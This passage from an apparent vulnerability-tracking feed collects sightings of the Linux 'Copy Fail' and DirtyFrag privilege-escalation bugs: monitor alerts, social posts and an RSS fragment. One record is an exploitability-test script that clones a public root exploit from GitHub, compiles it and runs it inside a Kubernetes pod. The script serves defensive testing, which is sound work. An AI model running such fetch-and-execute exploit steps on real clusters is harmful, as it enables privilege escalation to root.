\u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a copy_fail_mitigation\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a vorkampfer\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Shell\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-09 04:40:24\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nThis script will attempt to mitigate the copy_fail attack. CVE-2026-31431\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-09T05:00:04.000000Z"}, {"uuid": "d8e2498a-9991-43c1-bfde-ece8867e8977", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/83478", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a copy-fail-cve-2026-31431-linux-kernel-page-cache-lpe\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a Hunt-Benito\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-09 06:57:17\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u65e0\u63cf\u8ff0\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-09T07:00:04.000000Z"}, {"uuid": "53dd9450-e70f-43b4-8271-ef11d073704d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/linux.activitypub.awakari.com.ap.brid.gy/post/3mlfshfslugt2", "content": "Daniel Baumann: Debian: Linux Vulnerability Mitigation (Dirty Frag) After Copy Fail [ CVE-2026-31431 ] from last week, the new Linux local root privilege escalations of today are Dirty Frag (Part 1...\n\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-09T08:14:44.826066Z"}, {"uuid": "7cc5df2e-8fee-464b-88b0-0d151249a166", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/ytroncal.bsky.social/post/3mlfvbi7qic2y", "content": "CVE-2026-31431: Copy Fail retr0.zip/blog/cve-202...", "creation_timestamp": "2026-05-09T09:05:01.323856Z"}, {"uuid": "5672dcc4-d632-498a-8b51-b4585684f93c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/L06xv0vm_v9B-lUjnDANUtY1-6vQFMFDzrcYuiA5m0MAZkY", "content": "", "creation_timestamp": "2026-05-08T21:00:04.000000Z"}, {"uuid": "2fba49fd-70be-4e92-8276-128ddc852aed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3mlh66ow4ec2x", "content": "CISA Adds One Known Exploited Vulnerability to Catalog\nRelease Date May 01, 2026\n\nCVE-2026-31431 Linux Kernel Incorrect Resource Transfer Between Spheres Vulnerability", "creation_timestamp": "2026-05-09T21:17:12.273887Z"}, {"uuid": "d9450f34-7cd0-4f42-813c-d0de7115d731", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/pigondrugs.bsky.social/post/3mlgb2yg54o2f", "content": "@elastic.co\nCopy Fail and DirtyFrag are actively exploited Linux kernel bugs allowing local privilege escalation to root.\n-\nIOCs: CVE-2026-31431\n-\n#CVE202631431 #Linux #ThreatIntel", "creation_timestamp": "2026-05-09T12:36:08.218006Z"}, {"uuid": "97189663-ba3a-41b6-b0d3-9ff9f11de73f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/harushark3.bsky.social/post/3mlgeqijbls2k", "content": "[JP] 2026\u5e74\u306e\u65b0\u8106\u5f31\u6027\u300cCopy Fail\u300d\u8972\u6765\uff01Podman\u30eb\u30fc\u30c8\u30ec\u30b9\u74b0\u5883\u3078\u306e\u5f71\u97ff\u3068\u9632\u885b\u7b56\n[EN] The Arrival of the New Vulnerability \"Copy Fail\" in 2026! Impacts and Defenses for Podman''s\u2026\n\nhttps://ai-minor.com/blog/en/2026-05-09-1778322084176-podman_rootless_containers_and_the_copy_fail_explo\n\n#CopyFail #Podman #CVE-2026-31431 #AI #Tech", "creation_timestamp": "2026-05-09T13:41:50.707606Z"}, {"uuid": "dca7452e-e0f4-4a00-9121-6db41cbce63d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3mlh6b54ofc2x", "content": "CVE-2026-31431: \u30b3\u30d4\u30fc\u5931\u6557\u306e\u8106\u5f31\u6027\u306b\u3088\u308a\u3001\u30af\u30e9\u30a6\u30c9\u74b0\u5883\u5168\u4f53\u3067Linux\u306eroot\u6a29\u9650\u6607\u683c\u304c\u53ef\u80fd\u306b\u306a\u308b\n\nMicrosoft Defender \u306f\u3001Red Hat\u3001SUSE\u3001Ubuntu\u3001AWS Linux \u306a\u3069\u3001\u8907\u6570\u306e\u4e3b\u8981\u306a Linux \u30c7\u30a3\u30b9\u30c8\u30ea\u30d3\u30e5\u30fc\u30b7\u30e7\u30f3\u306b\u5f71\u97ff\u3092\u4e0e\u3048\u308b\u3001\u6df1\u523b\u5ea6\u306e\u9ad8\u3044\u30ed\u30fc\u30ab\u30eb\u6a29\u9650\u6607\u683c\u306e\u8106\u5f31\u6027 ( CVE-2026-31431 ) \u3092\u8abf\u67fb\u3057\u3066\u3044\u307e\u3059\u3002\u3053\u306e\u8106\u5f31\u6027\u306b\u3088\u308a\u3001\u6a29\u9650\u304c\u4e0d\u6b63\u306b root \u30ec\u30d9\u30eb\u307e\u3067\u6607\u683c\u3055\u308c\u308b\u53ef\u80fd\u6027\u304c\u3042\u308a\u3001\u30af\u30e9\u30a6\u30c9 Linux \u30ef\u30fc\u30af\u30ed\u30fc\u30c9\u306e\u5927\u90e8\u5206\u3068\u6570\u767e\u4e07\u306e Kubernetes \u30af\u30e9\u30b9\u30bf\u30fc\u306b\u5f71\u97ff\u3092\u53ca\u307c\u3057\u307e\u3059\u3002\u5b9f\u969b\u306e\u60aa\u7528\u306f\u9650\u5b9a\u7684\u3067\u3001\u4e3b\u306b...", "creation_timestamp": "2026-05-09T21:18:37.049121Z"}, {"uuid": "259ae820-b547-4402-892f-68106ce8f217", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/crustytldr.bsky.social/post/3mlgfxldttv2v", "content": "\ud83d\udd12 Copy/Fail Detection Script (CI/CD)(CVE-2026-31431)\n\nA detection script for the \"Copy/Fail\" vulnerability (CVE-2026-31431) affecting CI/CD systems is now available on GitHub. This tool hel...\n\nhttps://is.gd/2DliOx #CyberSecurity #InfoSec #CrustyTLDR", "creation_timestamp": "2026-05-09T14:03:41.935774Z"}, {"uuid": "a1cb1c04-1a7d-438b-9c06-e165ad9a42dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3mlh6jdddek2x", "content": "CISA\u304c\u3001\u60aa\u7528\u3055\u308c\u3066\u3044\u308bLinux\u30eb\u30fc\u30c8\u30a2\u30af\u30bb\u30b9\u8106\u5f31\u6027CVE-2026-31431\u3092KEV\u306b\u8ffd\u52a0\n\n\u7c73\u56fd\u306e\u30b5\u30a4\u30d0\u30fc\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u30fb\u30a4\u30f3\u30d5\u30e9\u30b9\u30c8\u30e9\u30af\u30c1\u30e3\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u5e81\uff08CISA\uff09\u306f\u91d1\u66dc\u65e5\u3001\u69d8\u3005\u306aLinux\u30c7\u30a3\u30b9\u30c8\u30ea\u30d3\u30e5\u30fc\u30b7\u30e7\u30f3\u306b\u5f71\u97ff\u3092\u4e0e\u3048\u308b\u6700\u8fd1\u660e\u3089\u304b\u306b\u306a\u3063\u305f\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u4e0a\u306e\u6b20\u9665\u3092\u3001\u65e2\u77e5\u306e\u60aa\u7528\u4e8b\u4f8b\uff08KEV \uff09\u30ab\u30bf\u30ed\u30b0\u306b\u8ffd\u52a0\u3057\u305f\u3002\u3053\u308c\u306f\u3001\u5b9f\u969b\u306b\u60aa\u7528\u3055\u308c\u3066\u3044\u308b\u8a3c\u62e0\u304c\u3042\u308b\u305f\u3081\u3060\u3002\n\nCVE-2026-31431\uff08CVSS\u30b9\u30b3\u30a2\uff1a7.8\uff09\u3068\u3057\u3066\u8ffd\u8de1\u3055\u308c\u3066\u3044\u308b\u3053\u306e\u8106\u5f31\u6027\u306f\u3001\u30ed\u30fc\u30ab\u30eb\u6a29\u9650\u6607\u683c\uff08LPE\uff09\u306e\u6b20\u9665\u3067\u3042\u308a\u3001\u6a29\u9650\u306e\u306a\u3044\u30ed\u30fc\u30ab\u30eb\u30e6\u30fc\u30b6\u30fc\u304croot\u6a29\u9650\u3092\u53d6\u5f97\u3067\u304d\u308b\u53ef\u80fd\u6027\u304c\u3042\u308a\u307e\u3059\u3002\u3053\u306e9\u5e74\u524d\u304b\u3089\u5b58\u5728\u3059...", "creation_timestamp": "2026-05-09T21:23:13.459813Z"}, {"uuid": "f0f50c5e-a606-4cdd-a4c4-e55ce2ef14b5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/mpjgregoire.cosocial.ca.ap.brid.gy/post/3mlgfyx3hmr32", "content": "Hmmm. #Debian is stepping on the gas with #Linux kernel updates these days. The obvious explanation is that they're dealing with the copy.fail security hole, but I think that's been mostly resolved ( https://security-tracker.debian.org/tracker/CVE-2026-31431 ).\n\nPossibly copy.fail is the first [\u2026]", "creation_timestamp": "2026-05-09T14:04:34.644573Z"}, {"uuid": "d120bf6f-896d-45c8-8fa1-a2c9aef10f01", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/intel.overresearched.net/post/3mlhcbcywjc2m", "content": "\ud83d\udd34 Copy Fail (CVE-2026-31431) on CISA KEV + DirtyFrag \u2014 Linux LPE on major distros\n\ud83d\udfe0 Genesis: 5 US victims in 24h\n\ud83d\udfe0 Fake OpenAI HF repo \u2192 Rust infostealer (244k DLs)\n\nFull brief: intel.overresearched.net/2026/05/09/c...\n\n#Daily #ThreatIntel #InfoSec", "creation_timestamp": "2026-05-09T22:30:13.529407Z"}, {"uuid": "0466b9c5-8cfd-4240-8436-3d1b4001be19", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/kzzalews/dc37275ebd58c0367245260abd1b5145", "content": "#!/usr/bin/env bash\n# =============================================================================\n# DirtyFrag & Copy Fail \u2014 Empirical Exploitability Test\n# Target:  Any AKS cluster (Ubuntu 22.04, kernel 5.15.x-azure)\n# CVEs:    CVE-2026-43284 (DirtyFrag xfrm-ESP)\n#          CVE-2026-43500 (DirtyFrag RxRPC)\n#          CVE-2026-31431 (Copy Fail / algif_aead)\n# Advisory: https://github.com/Azure/AKS/issues/5753\n# Author:  Karol Zalewski / Aiko (Claude Sonnet 4.6) \u2014 2026-05-09\n#\n# USAGE:\n#   Set AZ_RG, AZ_CLUSTER, KUBE_CONTEXT below to match your cluster,\n#   then run:  ./dirtyfrag-cve-test.sh 2>&1 | tee results.txt\n#\n# WARNING: This script compiles and executes a public exploit PoC\n#   (V4bel/dirtyfrag). Run only in DEV/test environments, with\n#   explicit team approval, and only if you are authorised to do so.\n# =============================================================================\n\nset -euo pipefail\n\n# --- config \u2014 EDIT THESE -----------------------------------------------------\nAZ_RG=\"example-rg\"                      # Azure resource group of the cluster\nAZ_CLUSTER=\"example-cluster\"            # AKS cluster name\nKUBE_CONTEXT=\"example-cluster\"          # kubectl context name\nNAMESPACE=\"default\"\nTEST_NODE_POOL=\"nodepool1\"               # picks first schedulable node from this pool\nPOD_DIRTYFRAG=\"dirtyfrag-test\"\nPOD_COPYFAIL=\"copyfail-test\"\n# -----------------------------------------------------------------------------\n\nRED='\\033[0;31m'; YELLOW='\\033[1;33m'; GREEN='\\033[0;32m'; CYAN='\\033[0;36m'; NC='\\033[0m'\n\nlog()  { echo -e \"${CYAN}[$(date +%H:%M:%S)]${NC} $*\"; }\nok()   { echo -e \"${GREEN}[OK]${NC} $*\"; }\nwarn() { echo -e \"${YELLOW}[WARN]${NC} $*\"; }\nerr()  { echo -e \"${RED}[ERROR]${NC} $*\"; }\n\nconfirm() {\n  local msg=\"${1:-Continue?}\"\n  echo \"\"\n  read -r -p \"$(echo -e \"${YELLOW}>>> ${msg} [y/N] ${NC}\")\" ans\n  [[ \"${ans}\" =~ ^[Yy]$ ]] || { warn \"Skipped by user.\"; return 1; }\n}\n\n# --- cleanup -----------------------------------------------------------------\nCLEANUP_DONE=0\ncleanup() {\n  [[ ${CLEANUP_DONE} -eq 1 ]] && return\n  CLEANUP_DONE=1\n  echo \"\"\n  warn \"=== CLEANUP ===\"\n  kubectl --context \"${KUBE_CONTEXT}\" delete pod \"${POD_DIRTYFRAG}\" \"${POD_COPYFAIL}\" \\\n    --force --ignore-not-found --namespace \"${NAMESPACE}\" 2>/dev/null || true\n  ok \"Test pods removed.\"\n}\ntrap cleanup EXIT INT TERM\n\n# =============================================================================\n# STEP 0 \u2014 Fetch kubeconfig & switch context\n# =============================================================================\necho \"\"\necho -e \"${CYAN}========================================${NC}\"\necho -e \"${CYAN}  DirtyFrag / Copy Fail \u2014 CVE Test     ${NC}\"\necho -e \"${CYAN}========================================${NC}\"\necho \"\"\n\nlog \"Step 0: Fetching kubeconfig for ${AZ_CLUSTER} (RG: ${AZ_RG})\"\naz aks get-credentials \\\n  --resource-group \"${AZ_RG}\" \\\n  --name \"${AZ_CLUSTER}\" \\\n  --overwrite-existing\nok \"Kubeconfig merged.\"\n\nkubectl config use-context \"${KUBE_CONTEXT}\"\nok \"Context set to: ${KUBE_CONTEXT}\"\n\n# --- sanity check ------------------------------------------------------------\nlog \"Verifying node state...\"\nkubectl --context \"${KUBE_CONTEXT}\" get nodes \\\n  -o custom-columns=\"NAME:.metadata.name,STATUS:.status.conditions[-1].type,KERNEL:.status.nodeInfo.kernelVersion,SCHED:.spec.unschedulable\" \\\n  2>/dev/null || true\necho \"\"\n\n# Pick first schedulable node from the target pool\nTARGET_NODE=$(kubectl --context \"${KUBE_CONTEXT}\" get nodes \\\n  --no-headers \\\n  -o custom-columns=\"NAME:.metadata.name,SCHED:.spec.unschedulable\" \\\n  2>/dev/null \\\n  | awk -v pool=\"${TEST_NODE_POOL}\" '$1 ~ pool && $2 == \"\" {print $1; exit}')\n\nif [[ -z \"${TARGET_NODE}\" ]]; then\n  err \"No schedulable '${TEST_NODE_POOL}' node found. Check node status above and re-run.\"\n  exit 1\nfi\nok \"Target node: ${TARGET_NODE}\"\n\n# =============================================================================\n# STEP 1 \u2014 DirtyFrag xfrm-ESP (CVE-2026-43284) \u2014 THE KEY QUESTION\n# =============================================================================\necho \"\"\necho -e \"${CYAN}--- Step 1: DirtyFrag xfrm-ESP (CVE-2026-43284) ---${NC}\"\nwarn \"This step compiles and runs the researcher PoC (V4bel/dirtyfrag).\"\nwarn \"Expected outcomes:\"\nwarn \"  ROOT SHELL   \u2192 kernel 5.15 IS vulnerable to xfrm-ESP; AKS advisory incorrect\"\nwarn \"  EXPLOIT FAIL \u2192 kernel 5.15 is NOT vulnerable; AKS advisory correct\"\necho \"\"\n\nconfirm \"Run DirtyFrag xfrm-ESP test on ${TARGET_NODE}?\" || { warn \"Skipping Step 1.\"; goto_step2=1; }\n\nif [[ -z \"${goto_step2:-}\" ]]; then\n  log \"Spawning compiler pod (gcc:13) on ${TARGET_NODE}...\"\n  kubectl --context \"${KUBE_CONTEXT}\" run \"${POD_DIRTYFRAG}\" \\\n    --image=gcc:13 \\\n    --restart=Never \\\n    --namespace \"${NAMESPACE}\" \\\n    --overrides=\"$(printf '{\n      \"spec\": {\n        \"nodeSelector\": {\"kubernetes.io/hostname\": \"%s\"},\n        \"tolerations\": [{\"operator\": \"Exists\"}]\n      }\n    }' \"${TARGET_NODE}\")\" \\\n    -- sleep 1800\n\n  log \"Waiting for pod to be Ready (up to 120s)...\"\n  kubectl --context \"${KUBE_CONTEXT}\" wait pod/\"${POD_DIRTYFRAG}\" \\\n    --for=condition=Ready --timeout=120s --namespace \"${NAMESPACE}\"\n  ok \"Pod ready.\"\n\n  KERNEL=$(kubectl --context \"${KUBE_CONTEXT}\" exec \"${POD_DIRTYFRAG}\" \\\n    --namespace \"${NAMESPACE}\" -- uname -r 2>/dev/null)\n  log \"Kernel on node: ${KERNEL}\"\n\n  log \"Cloning and compiling DirtyFrag PoC inside pod...\"\n  kubectl --context \"${KUBE_CONTEXT}\" exec \"${POD_DIRTYFRAG}\" \\\n    --namespace \"${NAMESPACE}\" -- bash -c '\n      git clone https://github.com/V4bel/dirtyfrag.git /tmp/dirtyfrag 2>&1\n      cd /tmp/dirtyfrag\n      gcc -O0 -Wall -o exp exp.c -lutil 2>&1\n      echo \"[COMPILE OK] binary: /tmp/dirtyfrag/exp\"\n    '\n\n  echo \"\"\n  warn \"About to execute the exploit as UID 65534 (nobody) inside the pod.\"\n  warn \"Watch for: root shell, uid=0, or /etc/passwd modification.\"\n  warn \"If you get a root prompt inside the pod, type 'exit' to return.\"\n  confirm \"Execute ./exp inside pod?\" || { warn \"Exploit execution skipped.\"; }\n\n  echo \"\"\n  echo -e \"${RED}=== EXPLOIT OUTPUT START ===${NC}\"\n  kubectl --context \"${KUBE_CONTEXT}\" exec -it \"${POD_DIRTYFRAG}\" \\\n    --namespace \"${NAMESPACE}\" -- \\\n    bash -c 'cd /tmp/dirtyfrag && su -s /bin/bash nobody -c \"./exp\" 2>&1 || ./exp' \\\n    || true\n  echo -e \"${RED}=== EXPLOIT OUTPUT END ===${NC}\"\n  echo \"\"\n\n  log \"Step 1 cleanup: clearing page cache and unloading modules on node...\"\n  kubectl --context \"${KUBE_CONTEXT}\" exec \"${POD_DIRTYFRAG}\" \\\n    --namespace \"${NAMESPACE}\" -- \\\n    bash -c 'echo 3 > /proc/sys/vm/drop_caches 2>/dev/null; rmmod esp4 esp6 rxrpc 2>/dev/null; echo \"cleanup done\"' \\\n    || warn \"Page cache flush may require privileged access \u2014 check node manually if exploit succeeded.\"\n\n  kubectl --context \"${KUBE_CONTEXT}\" delete pod \"${POD_DIRTYFRAG}\" \\\n    --force --ignore-not-found --namespace \"${NAMESPACE}\" 2>/dev/null || true\n  ok \"Step 1 pod removed.\"\nfi\n\n# =============================================================================\n# STEP 2 \u2014 DirtyFrag RxRPC (CVE-2026-43500) \u2014 expected FAIL on 5.15\n# =============================================================================\necho \"\"\necho -e \"${CYAN}--- Step 2: DirtyFrag RxRPC (CVE-2026-43500) ---${NC}\"\nwarn \"Expected: FAIL. Both AKS advisory and researcher agree RxRPC requires kernel >= 6.4.\"\nwarn \"This step confirms that kernel 5.15 is out-of-range for the RxRPC chain.\"\necho \"\"\n\nconfirm \"Run DirtyFrag RxRPC test (expected fail)?\" || { warn \"Skipping Step 2.\"; }\n\nif [[ \"${BASH_REMATCH[0]}\" != \"\" ]] || true; then\n  log \"Re-using same pod setup for Step 2...\"\n  kubectl --context \"${KUBE_CONTEXT}\" run \"${POD_DIRTYFRAG}\" \\\n    --image=gcc:13 \\\n    --restart=Never \\\n    --namespace \"${NAMESPACE}\" \\\n    --overrides=\"$(printf '{\n      \"spec\": {\n        \"nodeSelector\": {\"kubernetes.io/hostname\": \"%s\"},\n        \"tolerations\": [{\"operator\": \"Exists\"}]\n      }\n    }' \"${TARGET_NODE}\")\" \\\n    -- sleep 600 2>/dev/null || true\n\n  kubectl --context \"${KUBE_CONTEXT}\" wait pod/\"${POD_DIRTYFRAG}\" \\\n    --for=condition=Ready --timeout=120s --namespace \"${NAMESPACE}\" 2>/dev/null || true\n\n  log \"Checking if rxrpc module loads on 5.15...\"\n  echo -e \"${RED}=== RXRPC MODULE CHECK ===${NC}\"\n  kubectl --context \"${KUBE_CONTEXT}\" exec \"${POD_DIRTYFRAG}\" \\\n    --namespace \"${NAMESPACE}\" -- \\\n    bash -c '\n      uname -r\n      echo \"Attempting to load rxrpc...\"\n      modprobe rxrpc 2>&1 || echo \"modprobe rxrpc: failed (expected on 5.15 if module not present)\"\n      lsmod | grep rxrpc || echo \"rxrpc: not loaded\"\n      ls /lib/modules/$(uname -r)/kernel/net/rxrpc/ 2>/dev/null || echo \"rxrpc module directory: not found (kernel too old)\"\n    ' || true\n  echo -e \"${RED}=== END ===${NC}\"\n\n  kubectl --context \"${KUBE_CONTEXT}\" delete pod \"${POD_DIRTYFRAG}\" \\\n    --force --ignore-not-found --namespace \"${NAMESPACE}\" 2>/dev/null || true\n  ok \"Step 2 done.\"\nfi\n\n# =============================================================================\n# STEP 3 \u2014 Copy Fail baseline (CVE-2026-31431)\n# =============================================================================\necho \"\"\necho -e \"${CYAN}--- Step 3: Copy Fail baseline (CVE-2026-31431) ---${NC}\"\nwarn \"Non-root pod (UID 1000). Tests whether AF_ALG socket auto-loads algif_aead.\"\nwarn \"Expected to succeed on nodes WITHOUT an algif_aead blacklist.\"\necho \"\"\n\nconfirm \"Run Copy Fail baseline test?\" || { warn \"Skipping Step 3.\"; exit 0; }\n\nlog \"Spawning non-root pod (python:3.12-slim, UID 1000)...\"\nkubectl --context \"${KUBE_CONTEXT}\" run \"${POD_COPYFAIL}\" \\\n  --image=python:3.12-slim \\\n  --restart=Never \\\n  --namespace \"${NAMESPACE}\" \\\n  --overrides=\"$(printf '{\n    \"spec\": {\n      \"securityContext\": {\"runAsNonRoot\": true, \"runAsUser\": 1000, \"runAsGroup\": 1000},\n      \"nodeSelector\": {\"kubernetes.io/hostname\": \"%s\"},\n      \"tolerations\": [{\"operator\": \"Exists\"}]\n    }\n  }' \"${TARGET_NODE}\")\" \\\n  -- sleep 600\n\nkubectl --context \"${KUBE_CONTEXT}\" wait pod/\"${POD_COPYFAIL}\" \\\n  --for=condition=Ready --timeout=120s --namespace \"${NAMESPACE}\"\nok \"Pod ready.\"\n\necho \"\"\necho -e \"${RED}=== COPY FAIL \u2014 AF_ALG SOCKET TEST ===${NC}\"\nkubectl --context \"${KUBE_CONTEXT}\" exec \"${POD_COPYFAIL}\" \\\n  --namespace \"${NAMESPACE}\" -- \\\n  python3 -c \"\nimport socket, os\nprint('Running as UID:', os.getuid())\nprint('Kernel:', open('/proc/version').read().split()[2])\ntry:\n    s = socket.socket(38, 5, 0)  # AF_ALG, SOCK_SEQPACKET\n    s.bind(('aead', 'authencesn(hmac(sha256),cbc(aes))'))\n    print('RESULT: algif_aead auto-loaded via AF_ALG socket')\n    print('VERDICT: Node IS vulnerable to Copy Fail (CVE-2026-31431)')\n    s.close()\nexcept PermissionError as e:\n    print('RESULT: AF_ALG bind blocked -', e)\n    print('VERDICT: algif_aead blacklist active OR module unavailable')\nexcept OSError as e:\n    print('RESULT: AF_ALG socket error -', e)\n    print('VERDICT: Module not loadable (kernel too old or not present)')\n\" 2>&1 || true\necho -e \"${RED}=== END ===${NC}\"\n\nkubectl --context \"${KUBE_CONTEXT}\" delete pod \"${POD_COPYFAIL}\" \\\n  --force --ignore-not-found --namespace \"${NAMESPACE}\" 2>/dev/null || true\nok \"Step 3 done.\"\n\n# =============================================================================\n# SUMMARY\n# =============================================================================\necho \"\"\necho -e \"${CYAN}========================================${NC}\"\necho -e \"${CYAN}  Test complete.                        ${NC}\"\necho -e \"${CYAN}========================================${NC}\"\necho \"\"\necho \"Key things to note:\"\necho \"  - Step 1: Did ./exp produce a root shell? (y/n + full output)\"\necho \"  - Step 2: Was rxrpc.ko present on 5.15? (expected: no)\"\necho \"  - Step 3: Did AF_ALG socket load algif_aead? (expected: yes on unmitigated node)\"\necho \"  - Node: ${TARGET_NODE} / Context: ${KUBE_CONTEXT}\"\necho \"\"\n", "creation_timestamp": "2026-05-09T10:18:18.000000Z"}, {"uuid": "bf44cdef-a659-4170-808c-32d447190fe8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/83624", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-43500\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a attaattaatta\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Go\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-10 07:57:52\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCVE-2026-43500 / CVE-2026-31431 / CVE-2026-43284 golang hotfix\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-10T08:00:04.000000Z"}, {"uuid": "991261d7-b3e4-4c24-a0a2-1e517afabed4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/ael0030-ai/664ef04df47badeedb2f7f4889762ec0", "content": "\n\n  \n\n    Noticias de Alejandro Espa\u00f1a Lanceta\n    https://gist.githubusercontent.com/ael0030-ai/99660b1cfd870d17095a16aa263a4251/raw/noticias.xml\n    Canal RSS creado para la pr\u00e1ctica 9 del Tema 17, con noticias reales sobre sistemas y seguridad inform\u00e1tica.\n    es\n\n    \n    \n      Vulnerabilidad cr\u00edtica en Windows Server WSUS permite ejecuci\u00f3n remota\n      https://www.securityweek.com/critical-windows-server-wsus-vulnerability-exploited-in-the-wild/\n      Una vulnerabilidad grave en Windows Server WSUS (CVE-2025-59287) est\u00e1 siendo explotada activamente, permitiendo a atacantes ejecutar c\u00f3digo remoto en servidores vulnerables.\n        \n      ]]>\n      https://www.securityweek.com/critical-windows-server-wsus-vulnerability-exploited-in-the-wild/\n      ael0030@medac.es\n      Fri, 24 Oct 2025 10:42:00 GMT\n    \n\n    \n    \n      Ransomware BlackCat aprovecha servidores Exchange sin parchear\n      https://www.zdnet.com/article/microsoft-ransomware-gangs-using-unpatched-exchange-servers/\n      Microsoft ha alertado de que grupos de ransomware como BlackCat est\u00e1n explotando servidores Exchange sin actualizar para infiltrarse en redes corporativas.\n        \n      ]]>\n      https://www.zdnet.com/article/microsoft-ransomware-gangs-using-unpatched-exchange-servers/\n      ael0030@medac.es\n      Tue, 14 Jun 2022 08:11:00 GMT\n    \n\n    \n    \n      Fallo 'Copy Fail' en el kernel de Linux permite obtener acceso root\n      https://www.securityweek.com/copy-fail-logic-flaw-in-linux-kernel-enables-system-takeover/\n      Una vulnerabilidad en el kernel de Linux (CVE-2026-31431) permite a atacantes locales escalar privilegios y obtener acceso root en pr\u00e1cticamente cualquier distribuci\u00f3n.\n        \n      ]]>\n      https://www.securityweek.com/copy-fail-logic-flaw-in-linux-kernel-enables-system-takeover/\n      ael0030@medac.es\n      Thu, 30 